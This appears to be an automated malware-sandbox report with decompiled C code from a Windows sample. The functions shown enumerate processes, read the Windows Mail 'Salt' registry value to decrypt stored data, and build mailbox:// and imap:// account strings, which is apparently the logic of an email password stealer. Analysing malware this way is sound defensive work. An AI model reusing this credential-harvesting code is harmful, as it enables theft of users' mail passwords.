						_t34 =  &_a16;
						 *_t34 = _a16 - 1;
					} while ( *_t34 != 0);
					return _t57;
				}
				return _t47;
			}





















                                                                                                                                                    0x0040f25e
                                                                                                                                                    0x0040f264
                                                                                                                                                    0x0040f272
                                                                                                                                                    0x0040f278
                                                                                                                                                    0x0040f286
                                                                                                                                                    0x0040f28c
                                                                                                                                                    0x0040f291
                                                                                                                                                    0x0040f298
                                                                                                                                                    0x0040f2b6
                                                                                                                                                    0x0040f2bb
                                                                                                                                                    0x0040f2bb
                                                                                                                                                    0x0040f2c2
                                                                                                                                                    0x0040f2e0
                                                                                                                                                    0x0040f2f1
                                                                                                                                                    0x0040f2f6
                                                                                                                                                    0x0040f2f6
                                                                                                                                                    0x0040f30c
                                                                                                                                                    0x0040f31b
                                                                                                                                                    0x0040f320
                                                                                                                                                    0x0040f323
                                                                                                                                                    0x0040f328
                                                                                                                                                    0x0040f332
                                                                                                                                                    0x0040f335
                                                                                                                                                    0x0040f338
                                                                                                                                                    0x0040f341
                                                                                                                                                    0x0040f347
                                                                                                                                                    0x0040f34c
                                                                                                                                                    0x0040f34e
                                                                                                                                                    0x0040f353
                                                                                                                                                    0x0040f36c
                                                                                                                                                    0x0040f355
                                                                                                                                                    0x0040f362
                                                                                                                                                    0x0040f367
                                                                                                                                                    0x0040f367
                                                                                                                                                    0x0040f396
                                                                                                                                                    0x0040f3a5
                                                                                                                                                    0x0040f3aa
                                                                                                                                                    0x0040f3ad
                                                                                                                                                    0x0040f3b0
                                                                                                                                                    0x0040f3b0
                                                                                                                                                    0x0040f3b0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f3b5
                                                                                                                                                    0x0040f3b9

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: sprintf$memset$strcpy
                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                    • API String ID: 898937289-3842416460
                                                                                                                                                    • Opcode ID: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                                                                                    • Instruction ID: 9a5c5c5b7b50b61a4e5f96e5236d764a10b70f2cfe31ee2b12760fde8c14bfcc
                                                                                                                                                    • Opcode Fuzzy Hash: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                                                                                    • Instruction Fuzzy Hash: C3415FB284021D7ADF21EB55DC41FEB776CAF44344F0401FBBA09A2152E6389F988FA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E0DA Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040E0DA() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x417518 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryA("psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
					 *0x416fec = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x416fe4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
							 *0x416fdc = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x41710c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x416fe8 = _t2;
									if(_t2 != 0) {
										 *0x417518 = 1;
									}
								}
							}
						}
					}
					if( *0x417518 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}






                                                                                                                                                    0x0040e0e1
                                                                                                                                                    0x0040e171
                                                                                                                                                    0x0040e171
                                                                                                                                                    0x0040e0ed
                                                                                                                                                    0x0040e0f3
                                                                                                                                                    0x0040e0f7
                                                                                                                                                    0x0040e170
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e0f9
                                                                                                                                                    0x0040e106
                                                                                                                                                    0x0040e10a
                                                                                                                                                    0x0040e10f
                                                                                                                                                    0x0040e117
                                                                                                                                                    0x0040e11b
                                                                                                                                                    0x0040e120
                                                                                                                                                    0x0040e128
                                                                                                                                                    0x0040e12c
                                                                                                                                                    0x0040e131
                                                                                                                                                    0x0040e139
                                                                                                                                                    0x0040e13d
                                                                                                                                                    0x0040e142
                                                                                                                                                    0x0040e14a
                                                                                                                                                    0x0040e14e
                                                                                                                                                    0x0040e153
                                                                                                                                                    0x0040e155
                                                                                                                                                    0x0040e155
                                                                                                                                                    0x0040e153
                                                                                                                                                    0x0040e142
                                                                                                                                                    0x0040e131
                                                                                                                                                    0x0040e120
                                                                                                                                                    0x0040e167
                                                                                                                                                    0x0040e16a
                                                                                                                                                    0x0040e16a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e167

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040E16A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                    • API String ID: 2449869053-232097475
                                                                                                                                                    • Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                                                                                    • Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
                                                                                                                                                    • Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                                                                                    • Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410525 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136stringregistryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                    			E00410525(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v6;
				char _v7;
				char _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				short* _v24;
				unsigned int _v28;
				char* _v32;
				int _v36;
				intOrPtr _v40;
				signed int _v44;
				void _v299;
				char _v300;
				void _v555;
				char _v556;
				char _v1080;
				void* __esi;
				int _t56;
				intOrPtr _t58;
				intOrPtr _t64;
				char _t92;
				char* _t93;
				void* _t100;
				signed int _t102;
				signed int _t107;
				intOrPtr _t108;
				void* _t113;

				_t113 = __eflags;
				_t100 = __edx;
				_t93 = __eax;
				E004046D7( &_v1080);
				if(E004047A0( &_v1080, _t113) != 0) {
					_t56 = strlen(_t93);
					asm("cdq");
					_t107 = _t56 - _t100 >> 1;
					_t2 = _t107 + 1; // 0x1
					_t58 = _t2;
					L004115D0();
					_t102 = 0;
					_t96 = _t58;
					_v16 = _t58;
					if(_t107 > 0) {
						do {
							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
							_v7 = _t93[1 + _t102 * 2];
							_v6 = 0;
							_t92 = E00406512( &_v8);
							_t96 = _v16;
							 *((char*)(_t102 + _v16)) = _t92;
							_t102 = _t102 + 1;
						} while (_t102 < _t107);
					}
					_v556 = 0;
					memset( &_v555, 0, 0xff);
					_v12 = 0;
					_v300 = 0;
					memset( &_v299, 0, 0xfe);
					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
					if(_t64 != 1) {
						__eflags = _t64 - 2;
						if(_t64 == 2) {
							_push("Software\\Microsoft\\Windows Live Mail");
							goto L7;
						}
					} else {
						_push("Software\\Microsoft\\Windows Mail");
						L7:
						strcpy( &_v300, ??);
						_pop(_t96);
					}
					if(E0040EB3F(0x80000001,  &_v300,  &_v20) == 0) {
						_v12 = 0xff;
						E0040EBA3(_t96, _v20, "Salt",  &_v556,  &_v12);
						RegCloseKey(_v20);
					}
					_v40 = _v16;
					_v36 = _v12;
					_v32 =  &_v556;
					_v44 = _t107;
					if(E00404811( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
						_t108 = _a8;
						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
						(_t108 + 0x400)[_v28 >> 1] = 0;
						LocalFree(_v24);
					}
					_push(_v16);
					L004115D6();
				}
				return E004047F1( &_v1080);
			}































                                                                                                                                                    0x00410525
                                                                                                                                                    0x00410525
                                                                                                                                                    0x00410536
                                                                                                                                                    0x00410538
                                                                                                                                                    0x00410544
                                                                                                                                                    0x0041054c
                                                                                                                                                    0x00410551
                                                                                                                                                    0x00410556
                                                                                                                                                    0x00410558
                                                                                                                                                    0x00410558
                                                                                                                                                    0x0041055c
                                                                                                                                                    0x00410562
                                                                                                                                                    0x00410566
                                                                                                                                                    0x00410567
                                                                                                                                                    0x0041056a
                                                                                                                                                    0x0041056c
                                                                                                                                                    0x0041056f
                                                                                                                                                    0x00410576
                                                                                                                                                    0x0041057d
                                                                                                                                                    0x00410581
                                                                                                                                                    0x00410587
                                                                                                                                                    0x0041058a
                                                                                                                                                    0x0041058d
                                                                                                                                                    0x0041058e
                                                                                                                                                    0x0041056c
                                                                                                                                                    0x004105a1
                                                                                                                                                    0x004105a8
                                                                                                                                                    0x004105bc
                                                                                                                                                    0x004105bf
                                                                                                                                                    0x004105c5
                                                                                                                                                    0x004105cd
                                                                                                                                                    0x004105d9
                                                                                                                                                    0x004105e2
                                                                                                                                                    0x004105e5
                                                                                                                                                    0x004105e7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004105e7
                                                                                                                                                    0x004105db
                                                                                                                                                    0x004105db
                                                                                                                                                    0x004105ec
                                                                                                                                                    0x004105f3
                                                                                                                                                    0x004105f9
                                                                                                                                                    0x004105f9
                                                                                                                                                    0x00410614
                                                                                                                                                    0x00410629
                                                                                                                                                    0x0041062c
                                                                                                                                                    0x00410637
                                                                                                                                                    0x00410637
                                                                                                                                                    0x00410640
                                                                                                                                                    0x00410646
                                                                                                                                                    0x0041064f
                                                                                                                                                    0x00410664
                                                                                                                                                    0x0041066e
                                                                                                                                                    0x00410670
                                                                                                                                                    0x00410688
                                                                                                                                                    0x00410693
                                                                                                                                                    0x0041069d
                                                                                                                                                    0x0041069d
                                                                                                                                                    0x004106a3
                                                                                                                                                    0x004106a6
                                                                                                                                                    0x004106ac
                                                                                                                                                    0x004106bb

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                                                                    • strlen.MSVCRT ref: 0041054C
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0041055C
                                                                                                                                                    • memset.MSVCRT ref: 004105A8
                                                                                                                                                    • memset.MSVCRT ref: 004105C5
                                                                                                                                                    • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00410637
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0041069D
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004106A6
                                                                                                                                                      • Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004105E7
                                                                                                                                                    • Software\Microsoft\Windows Mail, xrefs: 004105DB
                                                                                                                                                    • Salt, xrefs: 00410621
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                    • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                    • API String ID: 1673043434-2687544566
                                                                                                                                                    • Opcode ID: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                                                                                                    • Instruction ID: 7afd7cd9a60bb03764dcbc3854d87102a14f95683297c5d7d0928fc071fa2b2b
                                                                                                                                                    • Opcode Fuzzy Hash: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                                                                                                    • Instruction Fuzzy Hash: D14186B2C0011CAECB11DBA5DC81ADEBBBCAF48344F1041ABE645F3251DA349A95CB68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CBA7 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E0040CBA7(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t37;
				void* _t53;
				char* _t54;
				intOrPtr _t60;
				void* _t61;
				char* _t62;
				void* _t67;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t87;
				void* _t88;
				void* _t89;

				_t87 = _a4;
				_t84 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
					_t37 = 0;
				} else {
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t37);
				L00411612();
				_t89 = _t88 + 0xc;
				if(_t37 == 0) {
					L8:
					_a4 = 0;
					if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
						while(1) {
							_t85 = E0040D438(_a4, _t84 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t85 + 0x104; // 0x104
							_t18 = _t85 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t85 + 0x104; // 0x104
							_t21 = _t85 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t53 = 0;
							_t89 = _t89 + 0x38;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t53);
							_t54 =  &_v620;
							_push(_t54);
							L004115B2();
							if(_t54 == 0) {
								goto L17;
							}
							_t61 = 0;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t61);
							_t62 =  &_v1232;
							_push(_t62);
							L004115B2();
							if(_t62 != 0) {
								L18:
								_a4 = _a4 + 1;
								_t60 = _v8;
								if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
									_t84 = _t60;
									continue;
								} else {
								}
							} else {
								goto L17;
							}
							goto L21;
							L17:
							if( *((char*)(E00406B0F( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
								E00401380(_t57 + 1, _t85 + 0x304, 0xff);
							} else {
								goto L18;
							}
							goto L21;
						}
					}
				} else {
					if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
						_t67 = 0;
					} else {
						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t67);
					L00411612();
					_t89 = _t89 + 0xc;
					if(_t67 == 0) {
						goto L8;
					}
				}
				L21:
				return 1;
			}





















                                                                                                                                                    0x0040cbb2
                                                                                                                                                    0x0040cbbb
                                                                                                                                                    0x0040cbbd
                                                                                                                                                    0x0040cbc0
                                                                                                                                                    0x0040cbcc
                                                                                                                                                    0x0040cbc2
                                                                                                                                                    0x0040cbc7
                                                                                                                                                    0x0040cbc7
                                                                                                                                                    0x0040cbce
                                                                                                                                                    0x0040cbd0
                                                                                                                                                    0x0040cbd5
                                                                                                                                                    0x0040cbd6
                                                                                                                                                    0x0040cbdb
                                                                                                                                                    0x0040cbe0
                                                                                                                                                    0x0040cc0b
                                                                                                                                                    0x0040cc11
                                                                                                                                                    0x0040cc14
                                                                                                                                                    0x0040cc23
                                                                                                                                                    0x0040cc32
                                                                                                                                                    0x0040cc3d
                                                                                                                                                    0x0040cc44
                                                                                                                                                    0x0040cc53
                                                                                                                                                    0x0040cc5a
                                                                                                                                                    0x0040cc5f
                                                                                                                                                    0x0040cc66
                                                                                                                                                    0x0040cc79
                                                                                                                                                    0x0040cc7e
                                                                                                                                                    0x0040cc85
                                                                                                                                                    0x0040cc98
                                                                                                                                                    0x0040cc9d
                                                                                                                                                    0x0040cc9f
                                                                                                                                                    0x0040cca5
                                                                                                                                                    0x0040ccac
                                                                                                                                                    0x0040ccac
                                                                                                                                                    0x0040ccaf
                                                                                                                                                    0x0040ccb0
                                                                                                                                                    0x0040ccb6
                                                                                                                                                    0x0040ccb7
                                                                                                                                                    0x0040ccc0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040ccc2
                                                                                                                                                    0x0040ccc7
                                                                                                                                                    0x0040ccce
                                                                                                                                                    0x0040ccce
                                                                                                                                                    0x0040ccd1
                                                                                                                                                    0x0040ccd2
                                                                                                                                                    0x0040ccd8
                                                                                                                                                    0x0040ccd9
                                                                                                                                                    0x0040cce2
                                                                                                                                                    0x0040ccf4
                                                                                                                                                    0x0040ccf4
                                                                                                                                                    0x0040ccf7
                                                                                                                                                    0x0040cd03
                                                                                                                                                    0x0040cc21
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040cd09
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040cce4
                                                                                                                                                    0x0040ccf2
                                                                                                                                                    0x0040cd17
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040ccf2
                                                                                                                                                    0x0040cc23
                                                                                                                                                    0x0040cbe2
                                                                                                                                                    0x0040cbe5
                                                                                                                                                    0x0040cbf1
                                                                                                                                                    0x0040cbe7
                                                                                                                                                    0x0040cbec
                                                                                                                                                    0x0040cbec
                                                                                                                                                    0x0040cbf3
                                                                                                                                                    0x0040cbf5
                                                                                                                                                    0x0040cbfa
                                                                                                                                                    0x0040cbfb
                                                                                                                                                    0x0040cc00
                                                                                                                                                    0x0040cc05
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040cc05
                                                                                                                                                    0x0040cd1e
                                                                                                                                                    0x0040cd24

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _stricmp_strnicmpmemsetsprintf$strlen
                                                                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                    • API String ID: 4281260487-2229823034
                                                                                                                                                    • Opcode ID: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                                                                                                                    • Instruction ID: 9e102a0fb77db954c7e66e430d6901f6f24083c0ab16dd7aca32eaa7b9d40139
                                                                                                                                                    • Opcode Fuzzy Hash: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                                                                                                                    • Instruction Fuzzy Hash: B84163B1604205EFD724DB69C881F96B7E8AF04344F144A7BEA4AE7281D738FA448B58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CBA5 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 122COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E0040CBA5(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t39;
				void* _t55;
				char* _t56;
				intOrPtr _t62;
				void* _t63;
				char* _t64;
				void* _t69;
				intOrPtr _t89;
				void* _t91;
				intOrPtr _t94;
				void* _t99;
				void* _t100;
				void* _t101;

				_t100 = _t99 - 0x4cc;
				_t94 = _a4;
				_t89 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
					_t39 = 0;
				} else {
					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t39);
				L00411612();
				_t101 = _t100 + 0xc;
				if(_t39 == 0) {
					L9:
					_a4 = 0;
					if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
						while(1) {
							_t91 = E0040D438(_a4, _t89 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t91 + 0x104; // 0x104
							_t18 = _t91 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t91 + 0x104; // 0x104
							_t21 = _t91 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t55 = 0;
							_t101 = _t101 + 0x38;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t55);
							_t56 =  &_v620;
							_push(_t56);
							L004115B2();
							if(_t56 == 0) {
								goto L18;
							}
							_t63 = 0;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t63);
							_t64 =  &_v1232;
							_push(_t64);
							L004115B2();
							if(_t64 != 0) {
								L19:
								_a4 = _a4 + 1;
								_t62 = _v8;
								if(_a4 <  *((intOrPtr*)(_t62 + 0x474))) {
									_t89 = _t62;
									continue;
								} else {
								}
							} else {
								goto L18;
							}
							goto L22;
							L18:
							if( *((char*)(E00406B0F( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
								E00401380(_t59 + 1, _t91 + 0x304, 0xff);
							} else {
								goto L19;
							}
							goto L22;
						}
					}
				} else {
					if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
						_t69 = 0;
					} else {
						_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t69);
					L00411612();
					_t101 = _t101 + 0xc;
					if(_t69 == 0) {
						goto L9;
					}
				}
				L22:
				return 1;
			}






















                                                                                                                                                    0x0040cbaa
                                                                                                                                                    0x0040cbb2
                                                                                                                                                    0x0040cbbb
                                                                                                                                                    0x0040cbbd
                                                                                                                                                    0x0040cbc0
                                                                                                                                                    0x0040cbcc
                                                                                                                                                    0x0040cbc2
                                                                                                                                                    0x0040cbc7
                                                                                                                                                    0x0040cbc7
                                                                                                                                                    0x0040cbce
                                                                                                                                                    0x0040cbd0
                                                                                                                                                    0x0040cbd5
                                                                                                                                                    0x0040cbd6
                                                                                                                                                    0x0040cbdb
                                                                                                                                                    0x0040cbe0
                                                                                                                                                    0x0040cc0b
                                                                                                                                                    0x0040cc11
                                                                                                                                                    0x0040cc14
                                                                                                                                                    0x0040cc23
                                                                                                                                                    0x0040cc32
                                                                                                                                                    0x0040cc3d
                                                                                                                                                    0x0040cc44
                                                                                                                                                    0x0040cc53
                                                                                                                                                    0x0040cc5a
                                                                                                                                                    0x0040cc5f
                                                                                                                                                    0x0040cc66
                                                                                                                                                    0x0040cc79
                                                                                                                                                    0x0040cc7e
                                                                                                                                                    0x0040cc85
                                                                                                                                                    0x0040cc98
                                                                                                                                                    0x0040cc9d
                                                                                                                                                    0x0040cc9f
                                                                                                                                                    0x0040cca5
                                                                                                                                                    0x0040ccac
                                                                                                                                                    0x0040ccac
                                                                                                                                                    0x0040ccaf
                                                                                                                                                    0x0040ccb0
                                                                                                                                                    0x0040ccb6
                                                                                                                                                    0x0040ccb7
                                                                                                                                                    0x0040ccc0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040ccc2
                                                                                                                                                    0x0040ccc7
                                                                                                                                                    0x0040ccce
                                                                                                                                                    0x0040ccce
                                                                                                                                                    0x0040ccd1
                                                                                                                                                    0x0040ccd2
                                                                                                                                                    0x0040ccd8
                                                                                                                                                    0x0040ccd9
                                                                                                                                                    0x0040cce2
                                                                                                                                                    0x0040ccf4
                                                                                                                                                    0x0040ccf4
                                                                                                                                                    0x0040ccf7
                                                                                                                                                    0x0040cd03
                                                                                                                                                    0x0040cc21
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040cd09
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040cce4
                                                                                                                                                    0x0040ccf2
                                                                                                                                                    0x0040cd17
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040ccf2
                                                                                                                                                    0x0040cc23
                                                                                                                                                    0x0040cbe2
                                                                                                                                                    0x0040cbe5
                                                                                                                                                    0x0040cbf1
                                                                                                                                                    0x0040cbe7
                                                                                                                                                    0x0040cbec
                                                                                                                                                    0x0040cbec
                                                                                                                                                    0x0040cbf3
                                                                                                                                                    0x0040cbf5
                                                                                                                                                    0x0040cbfa
                                                                                                                                                    0x0040cbfb
                                                                                                                                                    0x0040cc00
                                                                                                                                                    0x0040cc05
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040cc05
                                                                                                                                                    0x0040cd1d
                                                                                                                                                    0x0040cd24

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
